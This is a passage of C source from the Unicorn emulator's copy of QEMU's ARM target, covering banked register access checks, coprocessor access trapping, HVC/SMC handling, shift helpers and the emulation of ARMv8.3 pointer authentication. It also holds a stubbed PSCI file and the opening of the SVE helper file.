*/ int curmode = env->uncached_cpsr & CPSR_M; if (regno == 17) { /* ELR_Hyp: a special case because access from tgtmode is OK */ if (curmode != ARM_CPU_MODE_HYP && curmode != ARM_CPU_MODE_MON) { goto undef; } return; } if (curmode == tgtmode) { goto undef; } if (tgtmode == ARM_CPU_MODE_USR) { if (regno >= 8 && regno <= 12) { if (curmode != ARM_CPU_MODE_FIQ) { goto undef; } } else { switch (regno) { case 13: if (curmode == ARM_CPU_MODE_SYS) { goto undef; } break; case 14: if (curmode == ARM_CPU_MODE_HYP || curmode == ARM_CPU_MODE_SYS) { goto undef; } break; default: break; } } } if (tgtmode == ARM_CPU_MODE_HYP) { /* SPSR_Hyp, r13_hyp: accessible from Monitor mode only */ if (curmode != ARM_CPU_MODE_MON) { goto undef; } } return; undef: raise_exception(env, EXCP_UDEF, syn_uncategorized(), exception_target_el(env)); } void HELPER(msr_banked)(CPUARMState *env, uint32_t value, uint32_t tgtmode, uint32_t regno) { msr_mrs_banked_exc_checks(env, tgtmode, regno); if (regno >= 8 && regno <= 12) { switch (tgtmode) { case ARM_CPU_MODE_USR: env->usr_regs[regno - 8] = value; break; case ARM_CPU_MODE_FIQ: env->fiq_regs[regno - 8] = value; break; default: // g_assert_not_reached(); break; } } else { switch (regno) { case 16: /* SPSRs */ env->banked_spsr[bank_number(tgtmode)] = value; break; case 17: /* ELR_Hyp */ env->elr_el[2] = value; break; case 13: env->banked_r13[bank_number(tgtmode)] = value; break; case 14: env->banked_r14[r14_bank_number(tgtmode)] = value; break; default: g_assert_not_reached(); } } } uint32_t HELPER(mrs_banked)(CPUARMState *env, uint32_t tgtmode, uint32_t regno) { msr_mrs_banked_exc_checks(env, tgtmode, regno); if (regno >= 8 && regno <= 12) { switch (tgtmode) { case ARM_CPU_MODE_USR: return env->usr_regs[regno - 8]; case ARM_CPU_MODE_FIQ: return env->fiq_regs[regno - 8]; default: g_assert_not_reached(); // never reach here return 0; } } else { switch (regno) { case 16: /* SPSRs */ return env->banked_spsr[bank_number(tgtmode)]; case 17: /* ELR_Hyp */ return env->elr_el[2]; case 13: return env->banked_r13[bank_number(tgtmode)]; case 14: return env->banked_r14[r14_bank_number(tgtmode)]; default: g_assert_not_reached(); // never reach here return 0; } } } void HELPER(access_check_cp_reg)(CPUARMState *env, void *rip, uint32_t syndrome, uint32_t isread) { const ARMCPRegInfo *ri = rip; int target_el = 0; if (arm_feature(env, ARM_FEATURE_XSCALE) && ri->cp < 14 && extract32(env->cp15.c15_cpar, ri->cp, 1) == 0) { raise_exception(env, EXCP_UDEF, syndrome, exception_target_el(env)); } /* * Check for an EL2 trap due to HSTR_EL2. We expect EL0 accesses * to sysregs non accessible at EL0 to have UNDEF-ed already. */ if (!is_a64(env) && arm_current_el(env) < 2 && ri->cp == 15 && (arm_hcr_el2_eff(env) & (HCR_E2H | HCR_TGE)) != (HCR_E2H | HCR_TGE)) { uint32_t mask = 1 << ri->crn; if (ri->type & ARM_CP_64BIT) { mask = 1 << ri->crm; } /* T4 and T14 are RES0 */ mask &= ~((1 << 4) | (1 << 14)); if (env->cp15.hstr_el2 & mask) { target_el = 2; goto exept; } } if (!ri->accessfn) { return; } switch (ri->accessfn(env, ri, isread)) { case CP_ACCESS_OK: return; case CP_ACCESS_TRAP: target_el = exception_target_el(env); break; case CP_ACCESS_TRAP_EL2: /* Requesting a trap to EL2 when we're in EL3 or S-EL0/1 is * a bug in the access function. 
*/ assert(!arm_is_secure(env) && arm_current_el(env) != 3); target_el = 2; break; case CP_ACCESS_TRAP_EL3: target_el = 3; break; case CP_ACCESS_TRAP_UNCATEGORIZED: target_el = exception_target_el(env); syndrome = syn_uncategorized(); break; case CP_ACCESS_TRAP_UNCATEGORIZED_EL2: target_el = 2; syndrome = syn_uncategorized(); break; case CP_ACCESS_TRAP_UNCATEGORIZED_EL3: target_el = 3; syndrome = syn_uncategorized(); break; case CP_ACCESS_TRAP_FP_EL2: target_el = 2; /* Since we are an implementation that takes exceptions on a trapped * conditional insn only if the insn has passed its condition code * check, we take the IMPDEF choice to always report CV=1 COND=0xe * (which is also the required value for AArch64 traps). */ syndrome = syn_fp_access_trap(1, 0xe, false); break; case CP_ACCESS_TRAP_FP_EL3: target_el = 3; syndrome = syn_fp_access_trap(1, 0xe, false); break; default: g_assert_not_reached(); break; } exept: raise_exception(env, EXCP_UDEF, syndrome, target_el); } void HELPER(set_cp_reg)(CPUARMState *env, void *rip, uint32_t value) { const ARMCPRegInfo *ri = rip; if (ri->type & ARM_CP_IO) { ri->writefn(env, ri, value); } else { ri->writefn(env, ri, value); } } uint32_t HELPER(get_cp_reg)(CPUARMState *env, void *rip) { const ARMCPRegInfo *ri = rip; uint32_t res; if (ri->type & ARM_CP_IO) { res = ri->readfn(env, ri); } else { res = ri->readfn(env, ri); } return res; } void HELPER(set_cp_reg64)(CPUARMState *env, void *rip, uint64_t value) { const ARMCPRegInfo *ri = rip; if (ri->type & ARM_CP_IO) { ri->writefn(env, ri, value); } else { ri->writefn(env, ri, value); } } uint64_t HELPER(get_cp_reg64)(CPUARMState *env, void *rip) { const ARMCPRegInfo *ri = rip; uint64_t res; if (ri->type & ARM_CP_IO) { res = ri->readfn(env, ri); } else { res = ri->readfn(env, ri); } return res; } void HELPER(pre_hvc)(CPUARMState *env) { ARMCPU *cpu = env_archcpu(env); int cur_el = arm_current_el(env); /* FIXME: Use actual secure state. */ bool secure = false; bool undef; if (arm_is_psci_call(cpu, EXCP_HVC)) { /* If PSCI is enabled and this looks like a valid PSCI call then * that overrides the architecturally mandated HVC behaviour. */ return; } if (!arm_feature(env, ARM_FEATURE_EL2)) { /* If EL2 doesn't exist, HVC always UNDEFs */ undef = true; } else if (arm_feature(env, ARM_FEATURE_EL3)) { /* EL3.HCE has priority over EL2.HCD. */ undef = !(env->cp15.scr_el3 & SCR_HCE); } else { undef = env->cp15.hcr_el2 & HCR_HCD; } /* In ARMv7 and ARMv8/AArch32, HVC is undef in secure state. * For ARMv8/AArch64, HVC is allowed in EL3. * Note that we've already trapped HVC from EL0 at translation * time. */ if (secure && (!is_a64(env) || cur_el == 1)) { undef = true; } if (undef) { raise_exception(env, EXCP_UDEF, syn_uncategorized(), exception_target_el(env)); } } void HELPER(pre_smc)(CPUARMState *env, uint32_t syndrome) { ARMCPU *cpu = env_archcpu(env); int cur_el = arm_current_el(env); bool secure = arm_is_secure(env); bool smd_flag = env->cp15.scr_el3 & SCR_SMD; /* * SMC behaviour is summarized in the following table. * This helper handles the "Trap to EL2" and "Undef insn" cases. * The "Trap to EL3" and "PSCI call" cases are handled in the exception * helper. 
* * -> ARM_FEATURE_EL3 and !SMD * HCR_TSC && NS EL1 !HCR_TSC || !NS EL1 * * Conduit SMC, valid call Trap to EL2 PSCI Call * Conduit SMC, inval call Trap to EL2 Trap to EL3 * Conduit not SMC Trap to EL2 Trap to EL3 * * * -> ARM_FEATURE_EL3 and SMD * HCR_TSC && NS EL1 !HCR_TSC || !NS EL1 * * Conduit SMC, valid call Trap to EL2 PSCI Call * Conduit SMC, inval call Trap to EL2 Undef insn * Conduit not SMC Trap to EL2 Undef insn * * * -> !ARM_FEATURE_EL3 * HCR_TSC && NS EL1 !HCR_TSC || !NS EL1 * * Conduit SMC, valid call Trap to EL2 PSCI Call * Conduit SMC, inval call Trap to EL2 Undef insn * Conduit not SMC Undef insn Undef insn */ /* On ARMv8 with EL3 AArch64, SMD applies to both S and NS state. * On ARMv8 with EL3 AArch32, or ARMv7 with the Virtualization * extensions, SMD only applies to NS state. * On ARMv7 without the Virtualization extensions, the SMD bit * doesn't exist, but we forbid the guest to set it to 1 in scr_write(), * so we need not special case this here. */ bool smd = arm_feature(env, ARM_FEATURE_AARCH64) ? smd_flag : smd_flag && !secure; if (!arm_feature(env, ARM_FEATURE_EL3) && cpu->psci_conduit != QEMU_PSCI_CONDUIT_SMC) { /* If we have no EL3 then SMC always UNDEFs and can't be * trapped to EL2. PSCI-via-SMC is a sort of ersatz EL3 * firmware within QEMU, and we want an EL2 guest to be able * to forbid its EL1 from making PSCI calls into QEMU's * "firmware" via HCR.TSC, so for these purposes treat * PSCI-via-SMC as implying an EL3. * This handles the very last line of the previous table. */ raise_exception(env, EXCP_UDEF, syn_uncategorized(), exception_target_el(env)); } if (cur_el == 1 && (arm_hcr_el2_eff(env) & HCR_TSC)) { /* In NS EL1, HCR controlled routing to EL2 has priority over SMD. * We also want an EL2 guest to be able to forbid its EL1 from * making PSCI calls into QEMU's "firmware" via HCR.TSC. * This handles all the "Trap to EL2" cases of the previous table. */ raise_exception(env, EXCP_HYP_TRAP, syndrome, 2); } /* Catch the two remaining "Undef insn" cases of the previous table: * - PSCI conduit is SMC but we don't have a valid PCSI call, * - We don't have EL3 or SMD is set. */ if (!arm_is_psci_call(cpu, EXCP_SMC) && (smd || !arm_feature(env, ARM_FEATURE_EL3))) { raise_exception(env, EXCP_UDEF, syn_uncategorized(), exception_target_el(env)); } } /* ??? Flag setting arithmetic is awkward because we need to do comparisons. The only way to do that in TCG is a conditional branch, which clobbers all our temporaries. For now implement these as helper functions. */ /* Similarly for variable shift instructions. 
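 *
 * Worked example for the helpers below (illustrative values): only a
 * shift amount of exactly 32 copies a boundary bit into the carry
 * (bit 0 for LSL, bit 31 for LSR); larger amounts clear CF as well:
 *
 *   shl_cc(env, 0x80000001, 1);   // CF = 1 (old bit 31), result 0x2
 *   shl_cc(env, 0x80000001, 32);  // CF = 1 (old bit 0), result 0
 *   shl_cc(env, 0x80000001, 33);  // CF = 0, result 0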
 */
uint32_t HELPER(shl_cc)(CPUARMState *env, uint32_t x, uint32_t i)
{
    int shift = i & 0xff;
    if (shift >= 32) {
        if (shift == 32)
            env->CF = x & 1;
        else
            env->CF = 0;
        return 0;
    } else if (shift != 0) {
        env->CF = (x >> (32 - shift)) & 1;
        return x << shift;
    }
    return x;
}

uint32_t HELPER(shr_cc)(CPUARMState *env, uint32_t x, uint32_t i)
{
    int shift = i & 0xff;
    if (shift >= 32) {
        if (shift == 32)
            env->CF = (x >> 31) & 1;
        else
            env->CF = 0;
        return 0;
    } else if (shift != 0) {
        env->CF = (x >> (shift - 1)) & 1;
        return x >> shift;
    }
    return x;
}

uint32_t HELPER(sar_cc)(CPUARMState *env, uint32_t x, uint32_t i)
{
    int shift = i & 0xff;
    if (shift >= 32) {
        env->CF = (x >> 31) & 1;
        return (int32_t)x >> 31;
    } else if (shift != 0) {
        env->CF = (x >> (shift - 1)) & 1;
        return (int32_t)x >> shift;
    }
    return x;
}

uint32_t HELPER(ror_cc)(CPUARMState *env, uint32_t x, uint32_t i)
{
    int shift1, shift;
    shift1 = i & 0xff;
    shift = shift1 & 0x1f;
    if (shift == 0) {
        if (shift1 != 0)
            env->CF = (x >> 31) & 1;
        return x;
    } else {
        env->CF = (x >> (shift - 1)) & 1;
        return ((uint32_t)x >> shift) | (x << (32 - shift));
    }
}

uint32_t HELPER(uc_hooksys64)(CPUARMState *env, uint32_t insn, void *hk)
{
    uc_arm64_reg uc_rt;
    struct hook *hook = (struct hook *)hk;
    uc_arm64_cp_reg cp_reg;
    uint32_t rt;
    uc_engine *uc = env->uc;

    if (hook->to_delete) {
        return 0;
    }

    rt = extract32(insn, 0, 5);
    cp_reg.op0 = extract32(insn, 19, 2);
    cp_reg.op1 = extract32(insn, 16, 3);
    cp_reg.crn = extract32(insn, 12, 4);
    cp_reg.crm = extract32(insn, 8, 4);
    cp_reg.op2 = extract32(insn, 5, 3);

    /* rt is unsigned, so only the upper bound needs checking. */
    if (rt <= 28) {
        uc_rt = UC_ARM64_REG_X0 + rt;
        cp_reg.val = env->xregs[rt];
    } else if (rt == 29) {
        uc_rt = UC_ARM64_REG_X29;
        cp_reg.val = env->xregs[29];
    } else if (rt == 30) {
        uc_rt = UC_ARM64_REG_X30;
        cp_reg.val = env->xregs[30];
    } else {
        uc_rt = UC_ARM64_REG_XZR;
        cp_reg.val = 0;
    }

    uint32_t ret;
    JIT_CALLBACK_GUARD_VAR(ret, ((uc_cb_insn_sys_t)(hook->callback))(
                                    uc, uc_rt, &cp_reg, hook->user_data));
    return ret;
}
unicorn-2.1.1/qemu/target/arm/pauth_helper.c
/*
 * ARM v8.3-PAuth Operations
 *
 * Copyright (c) 2019 Linaro, Ltd.
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
* * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internals.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "exec/helper-proto.h" #include "tcg/tcg-gvec-desc.h" static uint64_t pac_cell_shuffle(uint64_t i) { uint64_t o = 0; o |= extract64(i, 52, 4); o |= extract64(i, 24, 4) << 4; o |= extract64(i, 44, 4) << 8; o |= extract64(i, 0, 4) << 12; o |= extract64(i, 28, 4) << 16; o |= extract64(i, 48, 4) << 20; o |= extract64(i, 4, 4) << 24; o |= extract64(i, 40, 4) << 28; o |= extract64(i, 32, 4) << 32; o |= extract64(i, 12, 4) << 36; o |= extract64(i, 56, 4) << 40; o |= extract64(i, 20, 4) << 44; o |= extract64(i, 8, 4) << 48; o |= extract64(i, 36, 4) << 52; o |= extract64(i, 16, 4) << 56; o |= extract64(i, 60, 4) << 60; return o; } static uint64_t pac_cell_inv_shuffle(uint64_t i) { uint64_t o = 0; o |= extract64(i, 12, 4); o |= extract64(i, 24, 4) << 4; o |= extract64(i, 48, 4) << 8; o |= extract64(i, 36, 4) << 12; o |= extract64(i, 56, 4) << 16; o |= extract64(i, 44, 4) << 20; o |= extract64(i, 4, 4) << 24; o |= extract64(i, 16, 4) << 28; o |= i & MAKE_64BIT_MASK(32, 4); o |= extract64(i, 52, 4) << 36; o |= extract64(i, 28, 4) << 40; o |= extract64(i, 8, 4) << 44; o |= extract64(i, 20, 4) << 48; o |= extract64(i, 0, 4) << 52; o |= extract64(i, 40, 4) << 56; o |= i & MAKE_64BIT_MASK(60, 4); return o; } static uint64_t pac_sub(uint64_t i) { static const uint8_t sub[16] = { 0xb, 0x6, 0x8, 0xf, 0xc, 0x0, 0x9, 0xe, 0x3, 0x7, 0x4, 0x5, 0xd, 0x2, 0x1, 0xa, }; uint64_t o = 0; int b; for (b = 0; b < 64; b += 4) { o |= (uint64_t)sub[(i >> b) & 0xf] << b; } return o; } static uint64_t pac_inv_sub(uint64_t i) { static const uint8_t inv_sub[16] = { 0x5, 0xe, 0xd, 0x8, 0xa, 0xb, 0x1, 0x9, 0x2, 0x6, 0xf, 0x0, 0x4, 0xc, 0x7, 0x3, }; uint64_t o = 0; int b; for (b = 0; b < 64; b += 4) { o |= (uint64_t)inv_sub[(i >> b) & 0xf] << b; } return o; } static int rot_cell(int cell, int n) { /* 4-bit rotate left by n. 
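 * E.g. rot_cell(0x9, 1): after the duplication below the cell reads
 * 0x99, and extracting 4 bits at position 4 - 1 = 3 gives 0x3,
 * i.e. 0b1001 rotated left by one is 0b0011.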
*/ cell |= cell << 4; return extract32(cell, 4 - n, 4); } static uint64_t pac_mult(uint64_t i) { uint64_t o = 0; int b; for (b = 0; b < 4 * 4; b += 4) { int i0, i4, i8, ic, t0, t1, t2, t3; i0 = extract64(i, b, 4); i4 = extract64(i, b + 4 * 4, 4); i8 = extract64(i, b + 8 * 4, 4); ic = extract64(i, b + 12 * 4, 4); t0 = rot_cell(i8, 1) ^ rot_cell(i4, 2) ^ rot_cell(i0, 1); t1 = rot_cell(ic, 1) ^ rot_cell(i4, 1) ^ rot_cell(i0, 2); t2 = rot_cell(ic, 2) ^ rot_cell(i8, 1) ^ rot_cell(i0, 1); t3 = rot_cell(ic, 1) ^ rot_cell(i8, 2) ^ rot_cell(i4, 1); o |= (uint64_t)t3 << b; o |= (uint64_t)t2 << (b + 4 * 4); o |= (uint64_t)t1 << (b + 8 * 4); o |= (uint64_t)t0 << (b + 12 * 4); } return o; } static uint64_t tweak_cell_rot(uint64_t cell) { return (cell >> 1) | (((cell ^ (cell >> 1)) & 1) << 3); } static uint64_t tweak_shuffle(uint64_t i) { uint64_t o = 0; o |= extract64(i, 16, 4) << 0; o |= extract64(i, 20, 4) << 4; o |= tweak_cell_rot(extract64(i, 24, 4)) << 8; o |= extract64(i, 28, 4) << 12; o |= tweak_cell_rot(extract64(i, 44, 4)) << 16; o |= extract64(i, 8, 4) << 20; o |= extract64(i, 12, 4) << 24; o |= tweak_cell_rot(extract64(i, 32, 4)) << 28; o |= extract64(i, 48, 4) << 32; o |= extract64(i, 52, 4) << 36; o |= extract64(i, 56, 4) << 40; o |= tweak_cell_rot(extract64(i, 60, 4)) << 44; o |= tweak_cell_rot(extract64(i, 0, 4)) << 48; o |= extract64(i, 4, 4) << 52; o |= tweak_cell_rot(extract64(i, 40, 4)) << 56; o |= tweak_cell_rot(extract64(i, 36, 4)) << 60; return o; } static uint64_t tweak_cell_inv_rot(uint64_t cell) { return ((cell << 1) & 0xf) | ((cell & 1) ^ (cell >> 3)); } static uint64_t tweak_inv_shuffle(uint64_t i) { uint64_t o = 0; o |= tweak_cell_inv_rot(extract64(i, 48, 4)); o |= extract64(i, 52, 4) << 4; o |= extract64(i, 20, 4) << 8; o |= extract64(i, 24, 4) << 12; o |= extract64(i, 0, 4) << 16; o |= extract64(i, 4, 4) << 20; o |= tweak_cell_inv_rot(extract64(i, 8, 4)) << 24; o |= extract64(i, 12, 4) << 28; o |= tweak_cell_inv_rot(extract64(i, 28, 4)) << 32; o |= tweak_cell_inv_rot(extract64(i, 60, 4)) << 36; o |= tweak_cell_inv_rot(extract64(i, 56, 4)) << 40; o |= tweak_cell_inv_rot(extract64(i, 16, 4)) << 44; o |= extract64(i, 32, 4) << 48; o |= extract64(i, 36, 4) << 52; o |= extract64(i, 40, 4) << 56; o |= tweak_cell_inv_rot(extract64(i, 44, 4)) << 60; return o; } static uint64_t pauth_computepac(uint64_t data, uint64_t modifier, ARMPACKey key) { static const uint64_t RC[5] = { 0x0000000000000000ull, 0x13198A2E03707344ull, 0xA4093822299F31D0ull, 0x082EFA98EC4E6C89ull, 0x452821E638D01377ull, }; const uint64_t alpha = 0xC0AC29B7C97C50DDull; /* * Note that in the ARM pseudocode, key0 contains bits <127:64> * and key1 contains bits <63:0> of the 128-bit key. 
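 *
 * The modk0 value computed below is key0 run through the QARMA-style
 * orthomorphism; written with ror64() from qemu/bitops.h it would
 * read, equivalently,
 *
 *   modk0 = ror64(key0, 1) ^ (key0 >> 63);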
*/ uint64_t key0 = key.hi, key1 = key.lo; uint64_t workingval, runningmod, roundkey, modk0; int i; modk0 = (key0 << 63) | ((key0 >> 1) ^ (key0 >> 63)); runningmod = modifier; workingval = data ^ key0; for (i = 0; i <= 4; ++i) { roundkey = key1 ^ runningmod; workingval ^= roundkey; workingval ^= RC[i]; if (i > 0) { workingval = pac_cell_shuffle(workingval); workingval = pac_mult(workingval); } workingval = pac_sub(workingval); runningmod = tweak_shuffle(runningmod); } roundkey = modk0 ^ runningmod; workingval ^= roundkey; workingval = pac_cell_shuffle(workingval); workingval = pac_mult(workingval); workingval = pac_sub(workingval); workingval = pac_cell_shuffle(workingval); workingval = pac_mult(workingval); workingval ^= key1; workingval = pac_cell_inv_shuffle(workingval); workingval = pac_inv_sub(workingval); workingval = pac_mult(workingval); workingval = pac_cell_inv_shuffle(workingval); workingval ^= key0; workingval ^= runningmod; for (i = 0; i <= 4; ++i) { workingval = pac_inv_sub(workingval); if (i < 4) { workingval = pac_mult(workingval); workingval = pac_cell_inv_shuffle(workingval); } runningmod = tweak_inv_shuffle(runningmod); roundkey = key1 ^ runningmod; workingval ^= RC[4 - i]; workingval ^= roundkey; workingval ^= alpha; } workingval ^= modk0; return workingval; } static uint64_t pauth_addpac(CPUARMState *env, uint64_t ptr, uint64_t modifier, ARMPACKey *key, bool data) { ARMMMUIdx mmu_idx = arm_stage1_mmu_idx(env); ARMVAParameters param = aa64_va_parameters(env, ptr, mmu_idx, data); uint64_t pac, ext_ptr, ext, test; int bot_bit, top_bit; /* If tagged pointers are in use, use ptr<55>, otherwise ptr<63>. */ if (param.tbi) { ext = sextract64(ptr, 55, 1); } else { ext = sextract64(ptr, 63, 1); } /* Build a pointer with known good extension bits. */ top_bit = 64 - 8 * param.tbi; bot_bit = 64 - param.tsz; ext_ptr = deposit64(ptr, bot_bit, top_bit - bot_bit, ext); pac = pauth_computepac(ext_ptr, modifier, *key); /* * Check if the ptr has good extension bits and corrupt the * pointer authentication code if not. */ test = sextract64(ptr, bot_bit, top_bit - bot_bit); if (test != 0 && test != -1) { pac ^= MAKE_64BIT_MASK(top_bit - 1, 1); } /* * Preserve the determination between upper and lower at bit 55, * and insert pointer authentication code. */ if (param.tbi) { ptr &= ~MAKE_64BIT_MASK(bot_bit, 55 - bot_bit + 1); pac &= MAKE_64BIT_MASK(bot_bit, 54 - bot_bit + 1); } else { ptr &= MAKE_64BIT_MASK(0, bot_bit); pac &= ~(MAKE_64BIT_MASK(55, 1) | MAKE_64BIT_MASK(0, bot_bit)); } ext &= MAKE_64BIT_MASK(55, 1); return pac | ext | ptr; } static uint64_t pauth_original_ptr(uint64_t ptr, ARMVAParameters param) { /* Note that bit 55 is used whether or not the regime has 2 ranges. 
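 *
 * E.g. with TBI set and tsz = 16 (a 48-bit VA), the PAC field is
 * bits [55:48], and the sign of bit 55 is smeared across that field
 * by the deposit below, restoring a canonical all-ones kernel or
 * all-zeroes user pointer.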
*/ uint64_t extfield = sextract64(ptr, 55, 1); int bot_pac_bit = 64 - param.tsz; int top_pac_bit = 64 - 8 * param.tbi; return deposit64(ptr, bot_pac_bit, top_pac_bit - bot_pac_bit, extfield); } static uint64_t pauth_auth(CPUARMState *env, uint64_t ptr, uint64_t modifier, ARMPACKey *key, bool data, int keynumber) { ARMMMUIdx mmu_idx = arm_stage1_mmu_idx(env); ARMVAParameters param = aa64_va_parameters(env, ptr, mmu_idx, data); int bot_bit, top_bit; uint64_t pac, orig_ptr, test; orig_ptr = pauth_original_ptr(ptr, param); pac = pauth_computepac(orig_ptr, modifier, *key); bot_bit = 64 - param.tsz; top_bit = 64 - 8 * param.tbi; test = (pac ^ ptr) & ~MAKE_64BIT_MASK(55, 1); if (unlikely(extract64(test, bot_bit, top_bit - bot_bit))) { int error_code = (keynumber << 1) | (keynumber ^ 1); if (param.tbi) { return deposit64(orig_ptr, 53, 2, error_code); } else { return deposit64(orig_ptr, 61, 2, error_code); } } return orig_ptr; } static uint64_t pauth_strip(CPUARMState *env, uint64_t ptr, bool data) { ARMMMUIdx mmu_idx = arm_stage1_mmu_idx(env); ARMVAParameters param = aa64_va_parameters(env, ptr, mmu_idx, data); return pauth_original_ptr(ptr, param); } static void QEMU_NORETURN pauth_trap(CPUARMState *env, int target_el, uintptr_t ra) { raise_exception_ra(env, EXCP_UDEF, syn_pactrap(), target_el, ra); } static void pauth_check_trap(CPUARMState *env, int el, uintptr_t ra) { if (el < 2 && arm_feature(env, ARM_FEATURE_EL2)) { uint64_t hcr = arm_hcr_el2_eff(env); bool trap = !(hcr & HCR_API); if (el == 0) { /* Trap only applies to EL1&0 regime. */ trap &= (hcr & (HCR_E2H | HCR_TGE)) != (HCR_E2H | HCR_TGE); } /* FIXME: ARMv8.3-NV: HCR_NV trap takes precedence for ERETA[AB]. */ if (trap) { pauth_trap(env, 2, ra); } } if (el < 3 && arm_feature(env, ARM_FEATURE_EL3)) { if (!(env->cp15.scr_el3 & SCR_API)) { pauth_trap(env, 3, ra); } } } static bool pauth_key_enabled(CPUARMState *env, int el, uint32_t bit) { return (arm_sctlr(env, el) & bit) != 0; } uint64_t HELPER(pacia)(CPUARMState *env, uint64_t x, uint64_t y) { int el = arm_current_el(env); if (!pauth_key_enabled(env, el, SCTLR_EnIA)) { return x; } pauth_check_trap(env, el, GETPC()); return pauth_addpac(env, x, y, &env->keys.apia, false); } uint64_t HELPER(pacib)(CPUARMState *env, uint64_t x, uint64_t y) { int el = arm_current_el(env); if (!pauth_key_enabled(env, el, SCTLR_EnIB)) { return x; } pauth_check_trap(env, el, GETPC()); return pauth_addpac(env, x, y, &env->keys.apib, false); } uint64_t HELPER(pacda)(CPUARMState *env, uint64_t x, uint64_t y) { int el = arm_current_el(env); if (!pauth_key_enabled(env, el, SCTLR_EnDA)) { return x; } pauth_check_trap(env, el, GETPC()); return pauth_addpac(env, x, y, &env->keys.apda, true); } uint64_t HELPER(pacdb)(CPUARMState *env, uint64_t x, uint64_t y) { int el = arm_current_el(env); if (!pauth_key_enabled(env, el, SCTLR_EnDB)) { return x; } pauth_check_trap(env, el, GETPC()); return pauth_addpac(env, x, y, &env->keys.apdb, true); } uint64_t HELPER(pacga)(CPUARMState *env, uint64_t x, uint64_t y) { uint64_t pac; pauth_check_trap(env, arm_current_el(env), GETPC()); pac = pauth_computepac(x, y, env->keys.apga); return pac & 0xffffffff00000000ull; } uint64_t HELPER(autia)(CPUARMState *env, uint64_t x, uint64_t y) { int el = arm_current_el(env); if (!pauth_key_enabled(env, el, SCTLR_EnIA)) { return x; } pauth_check_trap(env, el, GETPC()); return pauth_auth(env, x, y, &env->keys.apia, false, 0); } uint64_t HELPER(autib)(CPUARMState *env, uint64_t x, uint64_t y) { int el = arm_current_el(env); if 
(!pauth_key_enabled(env, el, SCTLR_EnIB)) {
        return x;
    }
    pauth_check_trap(env, el, GETPC());
    return pauth_auth(env, x, y, &env->keys.apib, false, 1);
}

uint64_t HELPER(autda)(CPUARMState *env, uint64_t x, uint64_t y)
{
    int el = arm_current_el(env);
    if (!pauth_key_enabled(env, el, SCTLR_EnDA)) {
        return x;
    }
    pauth_check_trap(env, el, GETPC());
    return pauth_auth(env, x, y, &env->keys.apda, true, 0);
}

uint64_t HELPER(autdb)(CPUARMState *env, uint64_t x, uint64_t y)
{
    int el = arm_current_el(env);
    if (!pauth_key_enabled(env, el, SCTLR_EnDB)) {
        return x;
    }
    pauth_check_trap(env, el, GETPC());
    return pauth_auth(env, x, y, &env->keys.apdb, true, 1);
}

uint64_t HELPER(xpaci)(CPUARMState *env, uint64_t a)
{
    return pauth_strip(env, a, false);
}

uint64_t HELPER(xpacd)(CPUARMState *env, uint64_t a)
{
    return pauth_strip(env, a, true);
}
unicorn-2.1.1/qemu/target/arm/psci.c
/*
 * Copyright (C) 2014 - Linaro
 * Author: Rob Herring <rob.herring@linaro.org>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, see <http://www.gnu.org/licenses/>.
 */
#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/helper-proto.h"
#include "internals.h"

bool arm_is_psci_call(ARMCPU *cpu, int excp_type)
{
    /* Return true if the r0/x0 value indicates a PSCI call and
     * the exception type matches the configured PSCI conduit. This is
     * called before the SMC/HVC instruction is executed, to decide whether
     * we should treat it as a PSCI call or with the architecturally
     * defined behaviour for an SMC or HVC (which might be UNDEF or trap
     * to EL2 or to EL3).
     */
    switch (excp_type) {
    case EXCP_HVC:
        if (cpu->psci_conduit != QEMU_PSCI_CONDUIT_HVC) {
            return false;
        }
        break;
    case EXCP_SMC:
        if (cpu->psci_conduit != QEMU_PSCI_CONDUIT_SMC) {
            return false;
        }
        break;
    default:
        return false;
    }

    /* PSCI emulation is stubbed out here: even when the conduit
     * matches, we report "not a PSCI call", so SMC/HVC always take
     * their architecturally defined behaviour.
     */
    return false;
}

void arm_handle_psci_call(ARMCPU *cpu)
{
}
unicorn-2.1.1/qemu/target/arm/sve_helper.c
/*
 * ARM SVE Operations
 *
 * Copyright (c) 2018 Linaro, Ltd.
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "internals.h"
#include "exec/exec-all.h"
#include "exec/cpu_ldst.h"
#include "exec/helper-proto.h"
#include "tcg/tcg-gvec-desc.h"
#include "fpu/softfloat.h"
#include "tcg/tcg.h"

/* Note that vector data is stored in host-endian 64-bit chunks,
   so addressing units smaller than that need a host-endian fixup. */
#ifdef HOST_WORDS_BIGENDIAN
#define H1(x)   ((x) ^ 7)
#define H1_2(x) ((x) ^ 6)
#define H1_4(x) ((x) ^ 4)
#define H2(x)   ((x) ^ 3)
#define H4(x)   ((x) ^ 1)
#else
#define H1(x)   (x)
#define H1_2(x) (x)
#define H1_4(x) (x)
#define H2(x)   (x)
#define H4(x)   (x)
#endif

/* Return a value for NZCV as per the ARM PredTest pseudofunction.
 *
 * The return value has bit 31 set if N is set, bit 1 set if Z is clear,
 * and bit 0 set if C is set. Compare the definitions of these variables
 * within CPUARMState.
 */

/* For no G bits set, NZCV = C. */
#define PREDTEST_INIT 1

